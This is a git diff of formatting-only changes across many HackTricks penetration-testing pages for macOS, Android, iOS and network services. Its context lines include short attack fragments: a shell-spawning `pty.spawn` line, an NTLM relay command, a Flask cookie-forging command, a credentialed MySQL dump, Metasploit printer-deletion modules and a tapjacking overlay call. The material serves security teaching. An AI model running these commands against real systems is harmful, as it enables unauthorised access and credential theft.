index 8eebb7112..790d4230e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -35,6 +35,7 @@ Moreover, it's possible to **remove the legit app from the Dock and put the fake More info and PoC in: + {{#ref}} ../../../macos-privilege-escalation.md {{#endref}} @@ -72,6 +73,7 @@ An app with the **`kTCCServiceAppleEvents`** permission will be able to **contro For more info about Apple Scripts check: + {{#ref}} macos-apple-scripts.md {{#endref}} @@ -262,6 +264,7 @@ For more info check the [**original report**](https://www.microsoft.com/en-us/se There are different techniques to inject code inside a process and abuse its TCC privileges: + {{#ref}} ../../../macos-proces-abuse/ {{#endref}} @@ -508,6 +511,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was ## By startup apps + {{#ref}} ../../../../macos-auto-start-locations.md {{#endref}} @@ -537,4 +541,3 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal {{#include ../../../../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index 3188664e1..d70abe26f 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -6,6 +6,7 @@ It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**: + {{#ref}} android-applications-basics.md {{#endref}} @@ -54,10 +55,12 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed ## Case Studies & Vulnerabilities + {{#ref}} ../ios-pentesting/air-keyboard-remote-input-injection.md {{#endref}} + {{#ref}} ../../linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md {{#endref}} @@ -98,6 +101,7 @@ In effect, it is **blinding the user from knowing they are actually performing a Find more information in: + {{#ref}} tapjacking.md {{#endref}} @@ -108,6 +112,7 @@ An **activity** with the **`launchMode`** set to **`singleTask` without any `tas More info in: + {{#ref}} android-task-hijacking.md {{#endref}} @@ -182,6 +187,7 @@ Developers shouldn't use **deprecated algorithms** to perform authorisation **ch Read the following page to learn how to easily access javascript code of React applications: + {{#ref}} react-native-application.md {{#endref}} @@ -190,6 +196,7 @@ react-native-application.md Read the following page to learn how to easily access C# code of a xamarin applications: + {{#ref}} ../xamarin-apps.md {{#endref}} @@ -210,6 +217,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains ### Bypass Biometric Authentication + {{#ref}} bypass-biometric-authentication-android.md {{#endref}} @@ -223,6 +231,7 @@ bypass-biometric-authentication-android.md ### **Other tricks** + {{#ref}} content-protocol.md {{#endref}} @@ -252,6 +261,7 @@ Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emu - [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator). - Learn to set it up in this page: + {{#ref}} avd-android-virtual-device.md {{#endref}} @@ -792,4 +802,3 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md index 704725b63..8be7f0e87 100644 --- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -223,6 +223,7 @@ Using [rootAVD](https://github.com/newbit1/rootAVD) with [Magisk](https://github Check the following page to learn how to install a custom CA cert: + {{#ref}} install-burp-certificate.md {{#endref}} @@ -238,4 +239,3 @@ You can **use the GUI** to take a snapshot of the VM at any time: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md index ce939a287..8911ed9d3 100644 --- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -107,6 +107,7 @@ wm.addView(phishingView, lp); For additional details on leveraging Accessibility Services for full remote device control (e.g. PlayPraetor, SpyNote, etc.) see: + {{#ref}} accessibility-services-abuse.md {{#endref}} @@ -114,4 +115,4 @@ accessibility-services-abuse.md ## References * [Bitsight – ToxicPanda Android Banking Malware 2025 Study](https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index bc38b67b0..e40b6aa0b 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -4,6 +4,7 @@ ## iOS Basics + {{#ref}} ios-basics.md {{#endref}} @@ -12,6 +13,7 @@ ios-basics.md In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:** + {{#ref}} ios-testing-environment.md {{#endref}} @@ -22,6 +24,7 @@ ios-testing-environment.md During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**: + {{#ref}} basic-ios-testing-operations.md {{#endref}} @@ -158,6 +161,7 @@ $ frida-ps -Uai Learn how to **enumerate the components of the application** and how to easily **hook methods and classes** with objection: + {{#ref}} ios-hooking-with-objection.md {{#endref}} @@ -387,6 +391,7 @@ However, the best options to disassemble the binary are: [**Hopper**](https://ww To learn about how iOS stores data in the device read this page: + {{#ref}} ios-basics.md {{#endref}} @@ -486,6 +491,7 @@ Developers are enabled to **store and sync data** within a **NoSQL cloud-hosted You can find how to check for misconfigured Firebase databases here: + {{#ref}} ../../network-services-pentesting/pentesting-web/buckets/firebase-database.md {{#endref}} @@ -1056,42 +1062,49 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i ### Custom URI Handlers / Deeplinks / Custom Schemes + {{#ref}} ios-custom-uri-handlers-deeplinks-custom-schemes.md {{#endref}} ### Universal Links + {{#ref}} ios-universal-links.md {{#endref}} ### UIActivity Sharing + {{#ref}} ios-uiactivity-sharing.md {{#endref}} ### UIPasteboard + {{#ref}} ios-uipasteboard.md {{#endref}} ### App Extensions + {{#ref}} ios-app-extensions.md {{#endref}} ### WebViews + {{#ref}} ios-webviews.md {{#endref}} ### Serialisation and Encoding + {{#ref}} ios-serialisation-and-encoding.md {{#endref}} @@ -1101,6 +1114,7 @@ ios-serialisation-and-encoding.md It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\ To check these kind of issues you can use a proxy like **Burp**: + {{#ref}} burp-configuration-for-ios.md {{#endref}} @@ -1150,6 +1164,7 @@ otool -L ## Interesting Vulnerabilities & Case Studies + {{#ref}} air-keyboard-remote-input-injection.md {{#endref}} @@ -1185,4 +1200,3 @@ air-keyboard-remote-input-injection.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index ef7cae772..e704e0d6b 100644 --- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -356,6 +356,7 @@ You can check the crashes in: ## Frida Android Tutorials + {{#ref}} ../android-app-pentesting/frida-tutorial/ {{#endref}} @@ -368,4 +369,3 @@ You can check the crashes in: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md index b5b049c65..cc059f238 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -58,6 +58,7 @@ Corellium is the only publicly available iOS emulator. It is an enterprise SaaS Check this blog post about how to pentest an iOS application in a **non jailbroken device**: + {{#ref}} ios-pentesting-without-jailbreak.md {{#endref}} @@ -104,6 +105,7 @@ Jailbreaking **removes OS-imposed sandboxing**, allowing apps to access the enti ### **After Jailbreaking** + {{#ref}} basic-ios-testing-operations.md {{#endref}} @@ -134,4 +136,3 @@ You can try to avoid this detections using **objection's** `ios jailbreak disabl {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md index 26461905b..2c6c373b0 100644 --- a/src/network-services-pentesting/11211-memcache/README.md +++ b/src/network-services-pentesting/11211-memcache/README.md @@ -183,6 +183,7 @@ memcached itself does not support replication. If you really need it you need to ### Commands Cheat-Sheet + {{#ref}} memcache-commands.md {{#endref}} @@ -199,4 +200,3 @@ memcache-commands.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index d2bedb3dc..43f2bde7a 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -53,6 +53,7 @@ PORT STATE SERVICE VERSION **Read the next page to learn how to enumerate this service:** + {{#ref}} 137-138-139-pentesting-netbios.md {{#endref}} @@ -84,4 +85,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md index 99db0ebee..27bbcd4c1 100644 --- a/src/network-services-pentesting/2375-pentesting-docker.md +++ b/src/network-services-pentesting/2375-pentesting-docker.md @@ -200,6 +200,7 @@ nmap -sV --script "docker-*" -p In the following page you can find ways to **escape from a docker container**: + {{#ref}} ../linux-hardening/privilege-escalation/docker-security/ {{#endref}} @@ -336,4 +337,3 @@ You can use auditd to monitor docker. {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md index b8710d1a9..2bef9323c 100644 --- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -58,6 +58,7 @@ This technique effectively blocks new devices from registering their services on The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ For more information check: + {{#ref}} ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}} @@ -69,4 +70,3 @@ For more information check: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index a9e1f8cc8..5b66ef2c2 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -8,6 +8,7 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P For more information check: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html {{#endref}} diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md index 0f385fd69..89dcb61be 100644 --- a/src/network-services-pentesting/5555-android-debug-bridge.md +++ b/src/network-services-pentesting/5555-android-debug-bridge.md @@ -35,6 +35,7 @@ adb root || true # Works on eng/userdebug/insecure builds, many em For a general ADB command reference, see: + {{#ref}} ../mobile-pentesting/android-app-pentesting/adb-commands.md {{#endref}} diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md index 182382fb8..7eeadcc64 100644 --- a/src/network-services-pentesting/8089-splunkd.md +++ b/src/network-services-pentesting/8089-splunkd.md @@ -113,6 +113,7 @@ pty.spawn('/bin/bash') In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: + {{#ref}} ../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md {{#endref}} @@ -124,4 +125,3 @@ In the following page you can find an explanation how this service can be abused {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md index 0018e3a7e..7b73e2d7e 100644 --- a/src/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md @@ -6,6 +6,7 @@ If you want to **learn what is FastCGI** check the following page: + {{#ref}} pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md {{#endref}} @@ -41,4 +42,3 @@ or you can also use the following python script: [https://gist.github.com/phith0 {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md index e060528da..522bca080 100644 --- a/src/network-services-pentesting/9100-pjl.md +++ b/src/network-services-pentesting/9100-pjl.md @@ -56,6 +56,7 @@ msf> use auxiliary/scanner/printer/printer_delete_file This is the tool you want to use to abuse printers: + {{#ref}} https://github.com/RUB-NDS/PRET {{#endref}} diff --git a/src/network-services-pentesting/9200-pentesting-elasticsearch.md b/src/network-services-pentesting/9200-pentesting-elasticsearch.md index 16d33e635..5b08e4868 100644 --- a/src/network-services-pentesting/9200-pentesting-elasticsearch.md +++ b/src/network-services-pentesting/9200-pentesting-elasticsearch.md @@ -175,6 +175,7 @@ Some tools will obtain some of the data presented before: msf > use auxiliary/scanner/elasticsearch/indices_enum ``` + {{#ref}} https://github.com/theMiddleBlue/nmap-elasticsearch-nse {{#endref}} diff --git a/src/network-services-pentesting/nfs-service-pentesting.md b/src/network-services-pentesting/nfs-service-pentesting.md index 2834d8fd6..d1a36ba42 100644 --- a/src/network-services-pentesting/nfs-service-pentesting.md +++ b/src/network-services-pentesting/nfs-service-pentesting.md @@ -124,6 +124,7 @@ Ofc, the only problem here is that by default it's not possible to impersonate r Check the page: + {{#ref}} ../linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md {{#endref}} @@ -201,4 +202,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index 1a4769092..f69776829 100644 --- a/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -6,6 +6,7 @@ ## Default passwords + {{#ref}} http://www.vulnerabilityassessment.co.uk/passwordsC.htm {{#endref}} diff --git a/src/network-services-pentesting/pentesting-kerberos-88/README.md b/src/network-services-pentesting/pentesting-kerberos-88/README.md index 7c6bc8467..225ab1c99 100644 --- a/src/network-services-pentesting/pentesting-kerberos-88/README.md +++ b/src/network-services-pentesting/pentesting-kerberos-88/README.md @@ -29,6 +29,7 @@ PORT STATE SERVICE The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest. + {{#ref}} https://adsecurity.org/?p=541 {{#endref}} diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 00624998b..011ecefaf 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -141,6 +141,7 @@ use_link [NAME] #### Get User + {{#ref}} types-of-mssql-users.md {{#endref}} @@ -300,6 +301,7 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.25 Using tools such as **responder** or **Inveigh** it's possible to **steal the NetNTLM hash**.\ You can see how to use these tools in: + {{#ref}} ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}} @@ -308,6 +310,7 @@ You can see how to use these tools in: [**Read this post**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature:** + {{#ref}} ../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md {{#endref}} @@ -612,10 +615,12 @@ For further information, refer to the following links regarding this attack: [De The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\ You probably will be able to **escalate to Administrator** following one of these 2 paged: + {{#ref}} ../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md {{#endref}} + {{#ref}} ../../windows-hardening/windows-local-privilege-escalation/juicypotato.md {{#endref}} @@ -696,4 +701,3 @@ Entry_3: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-mysql.md b/src/network-services-pentesting/pentesting-mysql.md index ec565c39f..25723f9ad 100644 --- a/src/network-services-pentesting/pentesting-mysql.md +++ b/src/network-services-pentesting/pentesting-mysql.md @@ -119,6 +119,7 @@ You can see in the docs the meaning of each privilege: [https://dev.mysql.com/do ### MySQL File RCE + {{#ref}} ../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md {{#endref}} @@ -754,4 +755,3 @@ john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/) {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-postgresql.md b/src/network-services-pentesting/pentesting-postgresql.md index e6b8bbacc..3d3733467 100644 --- a/src/network-services-pentesting/pentesting-postgresql.md +++ b/src/network-services-pentesting/pentesting-postgresql.md @@ -60,6 +60,7 @@ SELECT * FROM pg_extension; For more information about **how to abuse a PostgreSQL database** check: + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/ {{#endref}} @@ -303,6 +304,7 @@ A very important limitation of this technique is that **`copy` cannot be used to However, there are **other techniques to upload big binary files:** + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md {{#endref}} @@ -423,6 +425,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol ### RCE with PostgreSQL Languages + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md {{#endref}} @@ -431,6 +434,7 @@ More information about this vulnerability [**here**](https://medium.com/greenwol Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md {{#endref}} @@ -734,6 +738,7 @@ And then **execute commands**: **PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\ **You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** + {{#ref}} ../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md {{#endref}} @@ -806,4 +811,3 @@ The available password-based authentication methods in pg_hba.conf are **md5**, - diff --git a/src/network-services-pentesting/pentesting-rdp.md b/src/network-services-pentesting/pentesting-rdp.md index 62dd4bcb9..0c5055480 100644 --- a/src/network-services-pentesting/pentesting-rdp.md +++ b/src/network-services-pentesting/pentesting-rdp.md @@ -100,6 +100,7 @@ You can search RDPs that have been backdoored with one of these techniques alrea If someone from a different domain or with **better privileges login via RDP** to the PC where **you are an Admin**, you can **inject** your beacon in his **RDP session process** and act as him: + {{#ref}} ../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md {{#endref}} @@ -152,4 +153,3 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-smb/README.md b/src/network-services-pentesting/pentesting-smb/README.md index 12392ad0a..b7de7067f 100644 --- a/src/network-services-pentesting/pentesting-smb/README.md +++ b/src/network-services-pentesting/pentesting-smb/README.md @@ -48,6 +48,7 @@ The above command is an example of how `enum4linux` might be used to perform a f If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:** + {{#ref}} ../../windows-hardening/ntlm/ {{#endref}} @@ -173,6 +174,7 @@ run ### **Enumerating LSARPC and SAMR rpcclient** + {{#ref}} rpcclient-enumeration.md {{#endref}} @@ -591,4 +593,3 @@ Entry_6: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-smtp/README.md b/src/network-services-pentesting/pentesting-smtp/README.md index 76a33d55b..a814eaccf 100644 --- a/src/network-services-pentesting/pentesting-smtp/README.md +++ b/src/network-services-pentesting/pentesting-smtp/README.md @@ -248,6 +248,7 @@ print("[***]successfully sent email to %s:" % (msg['To'])) SMTP Smuggling vulnerability allowed to bypass all the SMTP protections (check the next section for more info about protections). For more info on SMTP Smuggling check: + {{#ref}} smtp-smuggling.md {{#endref}} @@ -607,4 +608,3 @@ Entry_8: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-snmp/README.md b/src/network-services-pentesting/pentesting-snmp/README.md index 10c780382..0d8002b3b 100644 --- a/src/network-services-pentesting/pentesting-snmp/README.md +++ b/src/network-services-pentesting/pentesting-snmp/README.md @@ -168,6 +168,7 @@ A series of **Management Information Base (MIB) values** are utilized to monitor Take a look to this page if you are Cisco equipment: + {{#ref}} cisco-snmp.md {{#endref}} @@ -176,6 +177,7 @@ cisco-snmp.md If you have the **string** that allows you to **write values** inside the SNMP service, you may be able to abuse it to **execute commands**: + {{#ref}} snmp-rce.md {{#endref}} @@ -284,4 +286,3 @@ Entry_5: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-ssh.md b/src/network-services-pentesting/pentesting-ssh.md index fba9d33cd..59376ff8b 100644 --- a/src/network-services-pentesting/pentesting-ssh.md +++ b/src/network-services-pentesting/pentesting-ssh.md @@ -133,6 +133,7 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms #### Known badkeys can be found here: + {{#ref}} https://github.com/rapid7/ssh-badkeys/tree/master/authorized {{#endref}} diff --git a/src/network-services-pentesting/pentesting-voip/README.md b/src/network-services-pentesting/pentesting-voip/README.md index c0d48cd04..33cf3efc4 100644 --- a/src/network-services-pentesting/pentesting-voip/README.md +++ b/src/network-services-pentesting/pentesting-voip/README.md @@ -7,6 +7,7 @@ To start learning about how VoIP works check: + {{#ref}} basic-voip-protocols/ {{#endref}} @@ -698,4 +699,3 @@ The easiest way to install a software such as Asterisk is to download an **OS di {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 274880d22..f5bdb8a19 100644 --- a/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/src/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -8,6 +8,7 @@ This is the industry standard, for more information check: + {{#ref}} sip-session-initiation-protocol.md {{#endref}} @@ -97,4 +98,3 @@ These protocols play essential roles in **delivering and securing real-time mult {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index fee20465f..41291959b 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md @@ -21,6 +21,7 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0 ### Web API Guidance + {{#ref}} web-api-pentesting.md {{#endref}} @@ -117,6 +118,7 @@ If the **source code** of the application is available in **github**, apart of p - Can you **access any of these files** exploiting some vulnerability? - Is there any **interesting information in the github** (solved and not solved) **issues**? Or in **commit history** (maybe some **password introduced inside an old commit**)? + {{#ref}} code-review-tools.md {{#endref}} @@ -313,6 +315,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri **403 Forbidden/Basic Authentication/401 Unauthorized (bypass)** + {{#ref}} 403-and-401-bypasses.md {{#endref}} @@ -335,6 +338,7 @@ It is possible to **put content** inside a **Redirection**. This content **won't Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here: + {{#ref}} ../../pentesting-web/web-vulnerabilities-methodology.md {{#endref}} @@ -424,4 +428,3 @@ Entry_12: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/buckets/README.md b/src/network-services-pentesting/pentesting-web/buckets/README.md index 9ed6844e1..854a43692 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/README.md +++ b/src/network-services-pentesting/pentesting-web/buckets/README.md @@ -4,6 +4,7 @@ Check this page if you want to learn more about enumerating and abusing Buckets: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md index ae9df2254..533695bc4 100644 --- a/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md +++ b/src/network-services-pentesting/pentesting-web/buckets/firebase-database.md @@ -8,6 +8,7 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused Learn more about Firebase in: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.html {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/drupal/README.md b/src/network-services-pentesting/pentesting-web/drupal/README.md index c811437de..be4b7ca85 100644 --- a/src/network-services-pentesting/pentesting-web/drupal/README.md +++ b/src/network-services-pentesting/pentesting-web/drupal/README.md @@ -72,6 +72,7 @@ droopescan scan drupal -u http://drupal-site.local If you have access to the Drupal web console check these options to get RCE: + {{#ref}} drupal-rce.md {{#endref}} @@ -100,4 +101,3 @@ mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index 0c2e4afef..59236ba8f 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -117,6 +117,7 @@ Modify the start-main configuration and add the use of a proxy such as: If you can execute locally an Electron App it's possible that you could make it execute arbitrary javascript code. Check how in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md {{#endref}} @@ -181,14 +182,17 @@ If the contexts aren't isolated an attacker can: There are 2 places where built-int methods can be overwritten: In preload code or in Electron internal code: + {{#ref}} electron-contextisolation-rce-via-preload-code.md {{#endref}} + {{#ref}} electron-contextisolation-rce-via-electron-internal-code.md {{#endref}} + {{#ref}} electron-contextisolation-rce-via-ipc.md {{#endref}} @@ -433,6 +437,7 @@ It's usually **configured** in the **`main.js`** file or in the **`index.html`** For more information check: + {{#ref}} pentesting-web/content-security-policy-csp-bypass/ {{#endref}} @@ -488,4 +493,3 @@ npm start {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index f79ea35d5..3c6eb967f 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -17,6 +17,7 @@ process.on("exit", function () { }) ``` + {{#ref}} https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36 {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index 968b3fb85..94842c1b3 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -26,6 +26,7 @@ The cookie is also signed using a password Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. + {{#ref}} https://pypi.org/project/flask-unsign/ {{#endref}} @@ -62,6 +63,7 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy Command line tool to brute-force websites using cookies crafted with flask-unsign. + {{#ref}} https://github.com/Tagvi/ripsession {{#endref}} diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index 7a7e4268e..03d3347e5 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -441,6 +441,7 @@ file:* query If you don't know what CSRF is read the following page: + {{#ref}} ../../pentesting-web/csrf-cross-site-request-forgery.md {{#endref}} @@ -475,6 +476,7 @@ Similar to CRSF vulnerabilities abusing graphQL it's also possible to perform a For more information check: + {{#ref}} ../../pentesting-web/websocket-attacks.md {{#endref}} @@ -698,6 +700,7 @@ const protectedSchema = applyMiddleware(schema, ...protect()); ### Automatic Tests + {{#ref}} 